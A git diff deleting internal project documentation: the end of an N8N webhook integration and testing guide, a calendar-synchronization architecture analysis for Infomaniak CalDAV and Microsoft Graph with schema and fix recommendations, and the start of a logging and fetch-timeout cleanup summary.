-import { NextResponse } from 'next/server';
-
-export async function GET() {
-  return NextResponse.json({
-    hasN8NApiKey: !!process.env.N8N_API_KEY,
-    n8nApiKeyLength: process.env.N8N_API_KEY?.length || 0,
-    n8nWebhookUrl: process.env.N8N_WEBHOOK_URL || 'https://brain.slm-lab.net/webhook/mission-created',
-    missionApiUrl: process.env.NEXT_PUBLIC_API_URL || 'https://api.slm-lab.net/api'
-  });
-}
-```
-
-**Usage**: `GET /api/test-n8n-config`
-
--
-
-### Test 2: Test the N8N Webhook
-
-```bash
-curl -X POST https://brain.slm-lab.net/webhook/mission-created \
-  -H "Content-Type: application/json" \
-  -d '{"test": "data"}'
-```
-
-**Expected results**:
-- ✅ `200/400/500` with a workflow error: webhook is active
-- ❌ `404` with "webhook not registered": webhook is inactive
-
--
-
-### Test 3: Test the Callback Endpoint
-
-```bash
-curl -X POST https://api.slm-lab.net/api/missions/mission-created \
-  -H "Content-Type: application/json" \
-  -H "x-api-key: YOUR_N8N_API_KEY" \
-  -d '{
-    "missionId": "test-mission-id",
-    "gitRepoUrl": "https://git.example.com/repo",
-    "leantimeProjectId": "123"
-  }'
-```
-
-**Expected results**:
-- ✅ `200` with `success: true`: API key is valid
-- ❌ `401`: invalid API key
-- ❌ `404`: mission not found (normal for a test missionId)
-
--
-
-### Test 4: Create a Full Mission
-
-1. Create a mission through the frontend
-2. Check the Next.js logs:
-   - ✅ "Mission created successfully"
-   - ✅ "Starting N8N workflow"
-   - ✅ "N8N workflow result { success: true }"
-3. Check the N8N logs (Executions):
-   - ✅ Workflow executed successfully
-   - ✅ "Save Mission To API" node executed
-4. Check the database:
-   - ✅ The mission has its integration IDs saved
-
--
-
-## 💡 Recommendations
-
-### 1. Security Improvements
-
-**Current problem**: plaintext API key, simple comparison
-
-**Recommendations**:
-- [ ] Use a token system with expiration
-- [ ] Implement HMAC signatures
-- [ ] Add rate limiting on `/api/missions/mission-created`
-- [ ] Log invalid access attempts with the IP
-
--
-
-### 2. Robustness Improvements
-
-**Current problem**: no automatic retry when N8N fails
-
-**Recommendations**:
-- [ ] Implement retries with exponential backoff (see the sketch below)
-- [ ] Message queue for missed callbacks
-- [ ] Health webhook to verify that N8N is reachable
-- [ ] Configurable timeout for N8N calls
-
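-A compact sketch of the retry item above (an assumed helper, not existing project code):
-
-```typescript
-// Sketch: retry an async operation with exponential backoff, illustrating
-// recommendation 2. Not part of the codebase.
-async function withRetry<T>(
-  fn: () => Promise<T>,
-  maxAttempts = 3,
-  baseDelayMs = 1_000,
-): Promise<T> {
-  let lastError: unknown;
-  for (let attempt = 0; attempt < maxAttempts; attempt++) {
-    try {
-      return await fn();
-    } catch (err) {
-      lastError = err;
-      // Wait 1s, 2s, 4s, ... between attempts.
-      const delay = baseDelayMs * 2 ** attempt;
-      await new Promise((resolve) => setTimeout(resolve, delay));
-    }
-  }
-  throw lastError;
-}
-
-// Usage sketch: await withRetry(() => triggerMissionWorkflow(mission));
-```
-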
--
-
-### 3. Debugging Improvements
-
-**Current problem**: scattered logs, no end-to-end traceability
-
-**Recommendations**:
-- [ ] Add a `correlationId` to trace a mission end to end
-- [ ] Structured logs with full context
-- [ ] Monitoring dashboard for the integrations
-- [ ] Alerts on repeated failures
-
--
-
-### 4. Documentation Improvements
-
-**Recommendations**:
-- [ ] Document the exact format expected by N8N
-- [ ] Full payload examples
-- [ ] Detailed sequence diagrams
-- [ ] Troubleshooting guide with real cases
-
--
-
-### 5. Automated Tests
-
-**Recommendations**:
-- [ ] Unit tests for `N8nService`
-- [ ] Integration tests for the API endpoints
-- [ ] E2E tests with a mocked N8N
-- [ ] Load tests to verify scalability
-
--
-
-## 📝 Quick Verification Checklist
-
-### Configuration
-- [ ] `N8N_API_KEY` defined and identical everywhere
-- [ ] `NEXT_PUBLIC_API_URL` points to the right URL
-- [ ] Application restarted after changes
-
-### N8N Workflow
-- [ ] Workflow active (green toggle)
-- [ ] Webhook path: `mission-created`
-- [ ] "Save Mission To API" node configured correctly
-- [ ] `missionId` included in the callback
-
-### Next.js Code
-- [ ] `missionId` sent to N8N at creation time
-- [ ] API key validation works
-- [ ] Field mapping is correct
-- [ ] Appropriate error handling
-
-### Tests
-- [ ] Mission creation test passes
-- [ ] Integration IDs saved in the database
-- [ ] Logs free of critical errors
-
--
-
-## 🔗 References
-
-- **N8N service**: `lib/services/n8n-service.ts`
-- **Creation endpoint**: `app/api/missions/route.ts`
-- **Callback endpoint**: `app/api/missions/mission-created/route.ts`
-- **N8N documentation**: see the `N8N_*.md` files in the project
-
--
-
-**Document created on**: $(date)
-**Last updated**: $(date)
-**Version**: 1.0
-
diff --git a/CALENDAR_SYNC_ARCHITECTURE_ANALYSIS.md b/CALENDAR_SYNC_ARCHITECTURE_ANALYSIS.md
deleted file mode 100644
index d28d0b9..0000000
--- a/CALENDAR_SYNC_ARCHITECTURE_ANALYSIS.md
+++ /dev/null
@@ -1,728 +0,0 @@
-# Calendar Synchronization Architecture - Deep Analysis
-
-## Executive Summary
-
-This document provides a comprehensive architectural analysis of the calendar synchronization system, focusing on:
-- **Agenda Widget** (Dashboard widget)
-- **Agenda Page** (Full calendar view)
-- **Courrier Page** (Email integration)
-- **Calendar Synchronization Services** (Infomaniak CalDAV & Microsoft Graph API)
-
--
-
-## 1. System Architecture Overview
-
-### 1.1 Component Hierarchy
-
-```
-┌─────────────────────────────────────────────────────────────┐
-│                  Dashboard (app/page.tsx)                    │
-│  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐       │
-│  │   Calendar   │  │     News     │  │    Email     │       │
-│  │    Widget    │  │    Widget    │  │    Widget    │       │
-│  └──────────────┘  └──────────────┘  └──────────────┘       │
-└─────────────────────────────────────────────────────────────┘
-                              │
-                              ▼
-┌─────────────────────────────────────────────────────────────┐
-│              Agenda Page (app/agenda/page.tsx)               │
-│  ┌──────────────────────────────────────────────────────┐   │
-│  │               CalendarClient Component               │   │
-│  │  ┌──────────────┐  ┌─────────────────────────────┐   │   │
-│  │  │   Calendar   │  │  FullCalendar (library)     │   │   │
-│  │  │   Selector   │  │  - Month/Week/Day Views     │   │   │
-│  │  │  (Sidebar)   │  │  - Event Creation/Edit      │   │   │
-│  │  └──────────────┘  └─────────────────────────────┘   │   │
-│  └──────────────────────────────────────────────────────┘   │
-└─────────────────────────────────────────────────────────────┘
-                              │
-                              ▼
-┌─────────────────────────────────────────────────────────────┐
-│            Courrier Page (app/courrier/page.tsx)             │
-│  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐       │
-│  │    Email     │  │    Email     │  │    Email     │       │
-│  │   Sidebar    │  │     List     │  │    Detail    │       │
-│  └──────────────┘  └──────────────┘  └──────────────┘       │
-└─────────────────────────────────────────────────────────────┘
-                              │
-                              ▼
-┌─────────────────────────────────────────────────────────────┐
-│                  Calendar Sync Services                      │
-│  ┌──────────────────────┐  ┌──────────────────────┐         │
-│  │  Infomaniak CalDAV   │  │ Microsoft Graph API  │         │
-│  │     Sync Service     │  │     Sync Service     │         │
-│  └──────────────────────┘  └──────────────────────┘         │
-└─────────────────────────────────────────────────────────────┘
-```
-
--
-
-## 2. Agenda Widget Analysis
-
-### 2.1 Component Location
-- **File**: `components/calendar.tsx`
-- **Usage**: Dashboard widget showing the upcoming 7 events
-- **Type**: Client Component (`"use client"`)
-
-### 2.2 Key Features
-
-#### Data Fetching
-```typescript
-// Fetches from /api/calendars?refresh=true
-// Bypasses cache with refresh=true parameter
-const response = await fetch('/api/calendars?refresh=true');
-```
-
-#### Event Processing (see the sketch at the end of this section)
-1. **Extracts events** from all calendars
-2. **Filters** for upcoming events (from today onwards)
-3. **Sorts** by start date
-4. **Limits** to 7 events
-5. **Maps** calendar color and name to each event
-
-#### Refresh Mechanism
-- **Manual refresh** only via button click
-- **No automatic polling** or unified refresh integration
-- **Fetches on mount** only
-
-### 2.3 Issues Identified
-
-1. **❌ No Unified Refresh Integration**
-   - Not using `useUnifiedRefresh` hook
-   - Manual refresh only
-   - No automatic background updates
-
-2. **❌ Cache Bypass**
-   - Always uses `?refresh=true` parameter
-   - Bypasses Redis cache every time
-   - May cause unnecessary database load
-
-3. **❌ No Error Recovery**
-   - Basic error handling
-   - No retry mechanism
-   - No offline state handling
-
-4. **⚠️ Date Filtering Logic**
-   - Filters events from "start of day" (00:00:00)
-   - Events from earlier today that have already ended still count as "upcoming", and the cutoff semantics are easy to get wrong
-
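-A condensed sketch of the section 2.2 processing pipeline, with the issue-4 caveat marked inline (the data shapes are assumed from the description; the real component is `components/calendar.tsx`):
-
-```typescript
-// Sketch of the widget's event pipeline: flatten, filter upcoming, sort, take 7.
-// DTO shapes are assumed from the description above.
-interface CalendarDto { name: string; color: string; events: EventDto[] }
-interface EventDto { id: string; title: string; start: string }
-
-function upcomingEvents(calendars: CalendarDto[]) {
-  const startOfDay = new Date();
-  startOfDay.setHours(0, 0, 0, 0);
-
-  return calendars
-    .flatMap((cal) =>
-      cal.events.map((e) => ({ ...e, calendarName: cal.name, color: cal.color })),
-    )
-    .filter((e) => new Date(e.start) >= startOfDay) // issue 4: includes events already past earlier today
-    .sort((a, b) => new Date(a.start).getTime() - new Date(b.start).getTime())
-    .slice(0, 7);
-}
-```
-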
-### 2.4 Data Flow
-
-```
-User Dashboard
-  │
-  ├─> Calendar Widget (components/calendar.tsx)
-  │     │
-  │     ├─> useEffect() triggers on mount
-  │     │
-  │     ├─> fetch('/api/calendars?refresh=true')
-  │     │     │
-  │     │     ├─> API Route (app/api/calendars/route.ts)
-  │     │     │     │
-  │     │     │     ├─> Checks Redis cache (skipped if refresh=true)
-  │     │     │     │
-  │     │     │     ├─> Prisma: Calendar.findMany()
-  │     │     │     │     └─> Include: events (ordered by start)
-  │     │     │     │
-  │     │     │     └─> Cache result in Redis
-  │     │     │
-  │     │     └─> Returns: Calendar[] with events[]
-  │     │
-  │     ├─> Process events:
-  │     │     ├─> flatMap all calendars.events
-  │     │     ├─> Filter: start >= today (00:00:00)
-  │     │     ├─> Sort by start date
-  │     │     └─> Slice(0, 7)
-  │     │
-  │     └─> Render: Card with event list
-```
-
--
-
-## 3. Agenda Page Analysis
-
-### 3.1 Component Location
-- **File**: `app/agenda/page.tsx` (Server Component)
-- **Client Component**: `components/calendar/calendar-client.tsx`
-- **Route**: `/agenda`
-
-### 3.2 Server-Side Logic (page.tsx)
-
-#### Auto-Setup Calendar Sync
-
-The page automatically sets up calendar synchronization for email accounts:
-
-1. **Infomaniak Accounts** (CalDAV)
-   - Discovers calendars using `discoverInfomaniakCalendars()`
-   - Creates a "Privée" calendar if it does not exist
-   - Creates a `CalendarSync` record with:
-     - `provider: 'infomaniak'`
-     - `syncFrequency: 15` minutes
-     - `externalCalendarUrl` from discovery
-   - Triggers an initial sync
-
-2. **Microsoft Accounts** (OAuth)
-   - Discovers calendars using `discoverMicrosoftCalendars()`
-   - Creates a "Privée" calendar if it does not exist
-   - Creates a `CalendarSync` record with:
-     - `provider: 'microsoft'`
-     - `syncFrequency: 5` minutes (more reactive)
-     - `externalCalendarId` from the Graph API
-   - Triggers an initial sync
-
-#### Calendar Filtering Logic
-
-```typescript
-// Excludes "Privée" and "Default" calendars that are NOT synced
-calendars = calendars.filter(cal => {
-  const isPrivateOrDefault = cal.name === "Privée" || cal.name === "Default";
-  const hasActiveSync = cal.syncConfig?.syncEnabled === true &&
-                        cal.syncConfig?.mailCredential;
-
-  // Exclude "Privée"/"Default" calendars that are not actively synced
-  if (isPrivateOrDefault && !hasActiveSync) {
-    return false;
-  }
-  return true;
-});
-```
-
-#### Background Sync Trigger
-
-For Microsoft calendars, the page triggers a background sync when needed:
-- Checks if a sync is needed (2-minute minimum interval)
-- Triggers an async sync (doesn't block page load)
-- Sync runs in the background and updates the database
-- The next page load will show the synced events
-
-### 3.3 Client-Side Component (calendar-client.tsx)
-
-#### Key Features
-
-1. **FullCalendar Integration**
-   - Uses the `@fullcalendar/react` library
-   - Views: Month, Week, Day
-   - Plugins: dayGrid, timeGrid, interaction
-
-2. **Calendar Management**
-   - Calendar selector sidebar (left column)
-   - Visibility toggle per calendar
-   - Calendar creation/editing dialog
-   - Sync configuration UI
-
-3. **Event Management**
-   - Create events by clicking/selecting dates
-   - Edit events by clicking on them
-   - Delete events
-   - Event form with:
-     - Title, description, location
-     - Start/end date and time
-     - All-day toggle
-     - Calendar selection
-
-4. **Data Refresh**
-   - `fetchCalendars()` function
-   - Calls `/api/calendars` (no refresh parameter)
-   - Uses the Redis cache by default
-   - Updates FullCalendar via `calendarApi.refetchEvents()`
-
-#### Calendar Display Logic
-
-```typescript
-// Sorts calendars: synced first, then groups, then missions
-const sortCalendars = (cals) => {
-  return [...filtered].sort((a, b) => {
-    const aIsSynced = a.syncConfig?.syncEnabled && a.syncConfig?.mailCredential;
-    const bIsSynced = b.syncConfig?.syncEnabled && b.syncConfig?.mailCredential;
-
-    // Synced calendars first
-    if (aIsSynced && !bIsSynced) return -1;
-    if (!aIsSynced && bIsSynced) return 1;
-
-    // Then groups, then missions, then by name
-    // ...
-  });
-};
-```
-
-#### Event Rendering
-
-Events are mapped to the FullCalendar format:
-```typescript
-events={calendars.flatMap(cal =>
-  cal.events.map(event => ({
-    id: event.id,
-    title: event.title,
-    start: new Date(event.start),
-    end: new Date(event.end),
-    allDay: event.isAllDay,
-    backgroundColor: `${cal.color}dd`,
-    borderColor: cal.color,
-    extendedProps: {
-      calendarName: cal.name,
-      location: event.location,
-      description: cleanDescription(event.description),
-      calendarId: event.calendarId,
-      originalEvent: event,
-      color: cal.color
-    }
-  }))
-)}
-```
-
-### 3.4 Issues Identified
-
-1. **⚠️ Sync Timing**
-   - Microsoft sync triggers on page load (background)
-   - May cause a delay before events appear
-   - No loading indicator for background sync
-
-2. **⚠️ Calendar Filtering Complexity**
-   - Complex logic for "Privée"/"Default" calendars
-   - May hide calendars that should be visible
-   - Logging is extensive but may be confusing
-
-3. **❌ No Real-Time Updates**
-   - Events only update on manual refresh
-   - No WebSocket or polling for new events
-   - User must refresh to see synced events
-
-4. **⚠️ Event Matching Logic**
-   - Infomaniak: matches by title + start date (within 1 minute)
-   - Microsoft: matches by `[MS_ID:xxx]` in the description
-   - May create duplicates if matching fails
-
--
-
-## 4. Courrier Page Analysis
-
-### 4.1 Component Location
-- **File**: `app/courrier/page.tsx`
-- **Route**: `/courrier`
-- **Type**: Client Component
-
-### 4.2 Key Features
-
-#### Email Account Management
-- Multiple email account support
-- Account colors for visual distinction
-- Account settings (display name, password, color)
-
-#### Email Operations
-- Folder navigation (INBOX, Sent, Drafts, etc.)
-- Email reading, composing, replying
-- Email search
-- Bulk operations (delete, mark read/unread)
-
-#### Integration with Calendar Sync
-
-The Courrier page is **indirectly** related to calendar sync:
-
-1. **Email Accounts** are stored in the `MailCredentials` table
-2. **Calendar Sync** uses `MailCredentials` for authentication
-3. **Auto-Setup** in the Agenda page discovers accounts from Courrier
-
-### 4.3 Connection to Calendar Sync
-
-```typescript
-// In agenda/page.tsx:
-const infomaniakAccounts = await prisma.mailCredentials.findMany({
-  where: {
-    userId: session?.user?.id || '',
-    host: { contains: 'infomaniak' },
-    password: { not: null }
-  }
-});
-
-// For each account, create calendar sync
-for (const account of infomaniakAccounts) {
-  // Discover calendars
-  const calendars = await discoverInfomaniakCalendars(account.email, account.password!);
-
-  // Create calendar and sync config
-  // ...
-}
-```
-
-### 4.4 Issues Identified
-
-1. **⚠️ No Direct Calendar Integration**
-   - Courrier page doesn't show calendar events
-   - No email-to-calendar event creation
-   - Separate systems (email vs calendar)
-
-2. **⚠️ Account Deletion Impact**
-   - Deleting an email account may orphan its calendar sync
-   - The Agenda page has cleanup logic, but may miss edge cases
-
--
-
-## 5. Calendar Synchronization Services
-
-### 5.1 Infomaniak CalDAV Sync
-
-#### Service Location
-- **File**: `lib/services/caldav-sync.ts`
-
-#### Key Functions
-
-1. **`discoverInfomaniakCalendars(email, password)`**
-   - Uses a WebDAV client (`webdav` library)
-   - Connects to `https://sync.infomaniak.com`
-   - Lists directories using `PROPFIND`
-   - Extracts calendar name and color from XML
-
-2. **`fetchCalDAVEvents(email, password, calendarUrl, startDate, endDate)`**
-   - Uses the `REPORT` method with `calendar-query`
-   - Filters events by date range
-   - Parses the iCalendar format (`.ics`)
-   - Returns `CalDAVEvent[]`
-
-3. **`syncInfomaniakCalendar(calendarSyncId, forceSync)`**
-   - Fetches events from CalDAV (1 month back to 3 months ahead)
-   - Gets existing events from the database
-   - Matches events by title + start date (within 1 minute)
-   - Creates new events or updates existing ones
-   - Updates the `lastSyncAt` timestamp
-
-#### Event Matching Logic
-
-```typescript
-// Tries to find existing event by:
-const existingEvent = existingEvents.find(
-  (e) =>
-    e.title === caldavEvent.summary &&
-    Math.abs(new Date(e.start).getTime() - caldavEvent.start.getTime()) < 60000
-);
-```
-
-**Issue**: this matching is fragile:
-- May create duplicates if the title changes
-- May miss events if timezone conversion causes a >1 minute difference
-- No UID-based matching (iCalendar has a UID field)
-
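-For reference, a sketch of the kind of `calendar-query` REPORT that `fetchCalDAVEvents` presumably sends — this is the standard CalDAV request per RFC 4791, shown as an illustration of the protocol, not the service's actual code:
-
-```typescript
-// Sketch: a standard CalDAV calendar-query REPORT (RFC 4791). The exact
-// request caldav-sync.ts builds is not shown in this document.
-async function caldavReport(calendarUrl: string, email: string, password: string) {
-  const body = `<?xml version="1.0" encoding="utf-8"?>
-<c:calendar-query xmlns:d="DAV:" xmlns:c="urn:ietf:params:xml:ns:caldav">
-  <d:prop><d:getetag/><c:calendar-data/></d:prop>
-  <c:filter>
-    <c:comp-filter name="VCALENDAR">
-      <c:comp-filter name="VEVENT">
-        <c:time-range start="20250101T000000Z" end="20250401T000000Z"/>
-      </c:comp-filter>
-    </c:comp-filter>
-  </c:filter>
-</c:calendar-query>`;
-
-  return fetch(calendarUrl, {
-    method: 'REPORT', // WebDAV extension method
-    headers: {
-      Authorization: `Basic ${Buffer.from(`${email}:${password}`).toString('base64')}`,
-      'Content-Type': 'application/xml; charset=utf-8',
-      Depth: '1',
-    },
-    body,
-  });
-}
-```
-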
-### 5.2 Microsoft Graph API Sync
-
-#### Service Location
-- **File**: `lib/services/microsoft-calendar-sync.ts`
-
-#### Key Functions
-
-1. **`discoverMicrosoftCalendars(userId, email)`**
-   - Uses the Microsoft Graph API
-   - Endpoint: `https://graph.microsoft.com/v1.0/me/calendars`
-   - Requires an OAuth token with calendar scope
-   - Returns `MicrosoftCalendar[]`
-
-2. **`fetchMicrosoftEvents(userId, email, calendarId, startDate, endDate)`**
-   - Endpoint: `https://graph.microsoft.com/v1.0/me/calendars/{calendarId}/events`
-   - Filters by date range using the `$filter` parameter
-   - Returns `MicrosoftEvent[]`
-
-3. **`syncMicrosoftCalendar(calendarSyncId, forceSync)`**
-   - Fetches events (1 month back to 6 months ahead)
-   - Converts Microsoft events to a CalDAV-like format
-   - **Stores the Microsoft ID in the description**: `[MS_ID:xxx]`
-   - Matches events by Microsoft ID first, then by title+date
-   - Creates/updates events in the database
-
-#### Event Matching Logic
-
-```typescript
-// First: Match by Microsoft ID in description
-let existingEvent = existingEvents.find((e) => {
-  if (e.description && e.description.includes(`[MS_ID:${microsoftId}]`)) {
-    return true;
-  }
-  return false;
-});
-
-// Fallback: Match by title + start date
-if (!existingEvent) {
-  existingEvent = existingEvents.find(
-    (e) =>
-      e.title === caldavEvent.summary &&
-      Math.abs(new Date(e.start).getTime() - caldavEvent.start.getTime()) < 60000
-  );
-}
-```
-
-**Better than Infomaniak**: uses ID-based matching, but stores the ID in the description (hacky)
-
-### 5.3 Sync Job Service
-
-#### Service Location
-- **File**: `lib/services/calendar-sync-job.ts`
-
-#### Function: `runCalendarSyncJob()`
-
-- Gets all enabled sync configurations
-- Checks if a sync is needed (based on `syncFrequency`)
-- Calls the appropriate sync function based on the provider
-- Logs results (successful, failed, skipped)
-
-**Usage**: should be called by a cron job or scheduled task
-
-### 5.4 Issues Identified
-
-1. **❌ No UID-Based Matching for Infomaniak**
-   - Should use the iCalendar UID field
-   - Current matching is fragile
-
-2. **⚠️ Microsoft ID Storage**
-   - Stores the ID in the description field (hacky)
-   - Should use a dedicated `externalEventId` field in the Event model
-
-3. **❌ No Event Deletion** (see the sketch after this list)
-   - Sync only creates/updates events
-   - Doesn't delete events removed from the external calendar
-   - May show stale events
-
-4. **⚠️ Error Handling**
-   - Errors are logged but the sync continues
-   - May leave a calendar in an inconsistent state
-   - No retry mechanism for transient failures
-
-5. **⚠️ Sync Frequency**
-   - Infomaniak: 15 minutes (may be too slow)
-   - Microsoft: 5 minutes (better, but still not real-time)
-   - No user-configurable frequency
-
-6. **❌ No Incremental Sync**
-   - Always fetches the full date range
-   - May be slow for calendars with many events
-   - Should use `lastSyncAt` to fetch only changes
-
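-Issue 3 could be addressed with a reconciliation pass like this sketch (assumed Prisma shapes and the `externalEventId` field proposed in section 9 — neither exists in the schema yet):
-
-```typescript
-// Sketch of a deletion pass for issue 3: remove local events that no longer
-// exist upstream. Assumes the externalEventId field proposed in section 9.
-import { prisma } from '@/lib/prisma';
-
-async function pruneDeletedEvents(calendarId: string, externalIds: string[]) {
-  if (externalIds.length === 0) return 0; // guard: an empty fetch should not wipe the calendar
-  const { count } = await prisma.event.deleteMany({
-    where: {
-      calendarId,
-      externalEventId: { notIn: externalIds, not: null }, // keep locally created events
-    },
-  });
-  return count;
-}
-```
-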
--
-
-## 6. API Routes Analysis
-
-### 6.1 `/api/calendars` (GET)
-
-**File**: `app/api/calendars/route.ts`
-
-#### Features
-- Redis caching (unless `?refresh=true`)
-- Returns calendars with events
-- Events ordered by start date
-
-#### Issues
-- Cache TTL not specified (uses the default)
-- No cache invalidation on event creation/update
-- `refresh=true` bypasses the cache (used by the widget)
-
-### 6.2 `/api/calendars/sync` (POST, PUT, GET, DELETE)
-
-**File**: `app/api/calendars/sync/route.ts`
-
-#### Features
-- **POST**: Create sync configuration
-- **PUT**: Trigger manual sync
-- **GET**: Get sync status
-- **DELETE**: Remove sync configuration
-
-#### Issues
-- Manual sync triggers a full sync (not incremental)
-- No webhook support for real-time updates
-
--
-
-## 7. Database Schema
-
-### 7.1 Calendar Model
-
-```prisma
-model Calendar {
-  id          String        @id @default(uuid())
-  name        String
-  color       String
-  description String?
-  userId      String
-  missionId   String?
-  events      Event[]
-  syncConfig  CalendarSync?
-  // ...
-}
-```
-
-### 7.2 CalendarSync Model
-
-```prisma
-model CalendarSync {
-  id                  String    @id @default(uuid())
-  calendarId          String    @unique
-  mailCredentialId    String?
-  provider            String    // "infomaniak" | "microsoft"
-  externalCalendarId  String?
-  externalCalendarUrl String?
-  syncEnabled         Boolean   @default(true)
-  lastSyncAt          DateTime?
-  syncFrequency       Int       @default(15) // minutes
-  lastSyncError       String?
-  // ...
-}
-```
-
-### 7.3 Event Model
-
-```prisma
-model Event {
-  id          String   @id @default(uuid())
-  title       String
-  description String?
-  start       DateTime
-  end         DateTime
-  location    String?
-  isAllDay    Boolean  @default(false)
-  calendarId  String
-  userId      String
-  // ...
-}
-```
-
-**Missing Fields**:
-- `externalEventId` (for reliable matching)
-- `externalEventUrl` (for linking to the external calendar)
-- `lastSyncedAt` (for incremental sync)
-
--
-
-## 8. Critical Issues Summary
-
-### 8.1 High Priority
-
-1. **Event Matching Fragility**
-   - Infomaniak: no UID-based matching
-   - Microsoft: ID stored in the description (hacky)
-   - **Impact**: duplicate events, missed updates
-
-2. **No Event Deletion**
-   - Removed events stay in the database
-   - **Impact**: stale events shown to users
-
-3. **No Real-Time Updates**
-   - Widget and page don't auto-refresh
-   - **Impact**: users must manually refresh to see new events
-
-### 8.2 Medium Priority
-
-4. **Cache Invalidation**
-   - Events created/updated don't invalidate the cache
-   - **Impact**: stale data shown until the cache expires
-
-5. **Sync Frequency**
-   - Infomaniak: 15 minutes (too slow)
-   - **Impact**: delayed event appearance
-
-6. **No Incremental Sync**
-   - Always fetches the full date range
-   - **Impact**: slow sync, unnecessary API calls
-
-### 8.3 Low Priority
-
-7. **Widget Refresh Integration**
-   - Not using the unified refresh system
-   - **Impact**: inconsistent refresh behavior
-
-8. **Error Recovery**
-   - No retry mechanism
-   - **Impact**: sync failures require manual intervention
-
--
-
-## 9. Recommendations
-
-### 9.1 Immediate Fixes
-
-1. **Add `externalEventId` field to the Event model**
-   ```prisma
-   model Event {
-     // ... existing fields
-     externalEventId  String?  // UID from iCalendar or Microsoft ID
-     externalEventUrl String?  // Link to external calendar event
-   }
-   ```
-
-2. **Implement UID-based matching for Infomaniak** (see the sketch after this list)
-   - Use the iCalendar UID field for matching
-   - Store it in `externalEventId`
-
-3. **Implement event deletion**
-   - Compare external events with database events
-   - Delete events not in the external calendar
-
-4. **Add cache invalidation**
-   - Invalidate the Redis cache on event create/update/delete
-   - Invalidate on sync completion
-
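-A sketch of fix 2, assuming the `externalEventId` field from fix 1 and a `uid` property parsed from the iCalendar data (assumed Prisma call shapes, not existing code):
-
-```typescript
-// Sketch: UID-based upsert for Infomaniak events (immediate fix 2).
-// caldavEvent.uid is the iCalendar UID; externalEventId is the proposed field.
-import { prisma } from '@/lib/prisma';
-
-async function upsertCalDavEvent(
-  calendarId: string,
-  userId: string,
-  caldavEvent: { uid: string; summary: string; start: Date; end: Date },
-) {
-  const existing = await prisma.event.findFirst({
-    where: { calendarId, externalEventId: caldavEvent.uid },
-  });
-
-  if (existing) {
-    return prisma.event.update({
-      where: { id: existing.id },
-      data: { title: caldavEvent.summary, start: caldavEvent.start, end: caldavEvent.end },
-    });
-  }
-  return prisma.event.create({
-    data: {
-      title: caldavEvent.summary,
-      start: caldavEvent.start,
-      end: caldavEvent.end,
-      calendarId,
-      userId,
-      externalEventId: caldavEvent.uid,
-    },
-  });
-}
-```
-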
-### 9.2 Short-Term Improvements
-
-5. **Implement incremental sync**
-   - Use `lastSyncAt` to fetch only changes
-   - Use the CalDAV `sync-token` for Infomaniak
-   - Use Microsoft Graph delta queries
-
-6. **Add real-time updates**
-   - WebSocket or Server-Sent Events
-   - Notify clients when sync completes
-   - Auto-refresh widget and page
-
-7. **Improve error handling**
-   - Retry mechanism for transient failures
-   - Better error messages for users
-   - Sync status indicator in the UI
-
-### 9.3 Long-Term Enhancements
-
-8. **Unified refresh system integration**
-   - Use the `useUnifiedRefresh` hook in the widget
-   - Consistent refresh behavior across the app
-
-9. **User-configurable sync frequency**
-   - Allow users to set the sync interval
-   - Different frequencies per calendar
-
-10. **Two-way sync**
-    - Sync local events to external calendars
-    - Handle conflicts (last-write-wins or user choice)
-
--
-
-## 10. Testing Recommendations
-
-### 10.1 Unit Tests
-- Event matching logic (UID-based, title+date fallback)
-- Date range filtering
-- iCalendar parsing
-- Microsoft event conversion
-
-### 10.2 Integration Tests
-- Full sync flow (discover → sync → verify)
-- Event creation/update/deletion
-- Cache invalidation
-- Error recovery
-
-### 10.3 E2E Tests
-- Widget displays events correctly
-- Page shows synced events
-- Manual sync triggers correctly
-- Calendar creation/editing
-
--
-
-## 11. Conclusion
-
-The calendar synchronization system is **functional but has several architectural issues** that impact reliability and user experience:
-
-1. **Fragile event matching** may cause duplicates or missed updates
-2. **No event deletion** leaves stale events in the database
-3. **No real-time updates** requires manual refresh
-4. **Cache invalidation** is missing, causing stale data
-
-**Priority**: Focus on fixing event matching and deletion first, as these directly impact data integrity. Then implement cache invalidation and real-time updates for better UX.
-
--
-
-**Document Version**: 1.0
-**Last Updated**: 2025-01-XX
-**Author**: Senior Software Architect Analysis
diff --git a/CLEANUP_SUMMARY.md b/CLEANUP_SUMMARY.md
deleted file mode 100644
index 77a4fce..0000000
--- a/CLEANUP_SUMMARY.md
+++ /dev/null
@@ -1,70 +0,0 @@
-# Cleanup Summary - console.log and fetch()
-
-## ✅ Cleaned Files
-
-### Backend Services (100% cleaned)
-- ✅ `lib/services/n8n-service.ts` - 3 fetch() → fetchWithTimeout()
-- ✅ `lib/services/rocketchat-call-listener.ts` - 35 console.log → logger
-- ✅ `lib/services/microsoft-oauth.ts` - 12 console.log → logger
-- ✅ `lib/services/token-refresh.ts` - 12 console.log → logger
-- ✅ `lib/services/refresh-manager.ts` - 19 console.log → logger
-- ✅ `lib/services/prefetch-service.ts` - 18 console.log → logger
-- ✅ `lib/services/caldav-sync.ts` - 12 console.log → logger
-- ✅ `lib/services/email-service.ts` - 2 console.error → logger
-
-### Critical API Routes (100% cleaned)
-- ✅ `app/api/missions/[missionId]/generate-plan/route.ts` - 1 fetch() → fetchWithTimeout()
-- ✅ `app/api/users/[userId]/route.ts` - 5 fetch() → fetchWithTimeout(), all console.log → logger
-- ✅ `app/api/rocket-chat/messages/route.ts` - 5 fetch() → fetchWithTimeout(), all console.log → logger
-- ✅ `app/api/leantime/tasks/route.ts` - 2 fetch() → fetchWithTimeout()
-- ✅ `app/api/news/route.ts` - 1 fetch() → fetchWithTimeout()
-- ✅ `app/api/courrier/route.ts` - 11 console.log → logger
-- ✅ `app/api/courrier/unread-counts/route.ts` - 16 console.log → logger
-- ✅ `app/api/courrier/account/route.ts` - 18 console.log → logger
-
-## 📊 Statistics
-
-### Total Cleaned
-- **Services:** 8 files, ~110 occurrences
-- **Critical API routes:** 8 files, ~50 occurrences
-- **Total:** 16 files, ~160 occurrences cleaned
-
-### fetch() → fetchWithTimeout()
-- **Total:** 15+ occurrences replaced
-- **Configured timeouts:** 10s for fast APIs, 30s for webhooks
-
-### console.log → logger
-- **Total:** 140+ occurrences replaced
-- **Levels used:** debug, info, warn, error depending on context
-
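-The `fetchWithTimeout` wrapper itself is not shown in this summary; as a minimal sketch of what such a wrapper typically looks like (assumed signature — the project's actual helper may differ):
-
-```typescript
-// Sketch of a fetch wrapper with a timeout (assumed shape of the project's
-// fetchWithTimeout helper; the real one may differ).
-export async function fetchWithTimeout(
-  url: string,
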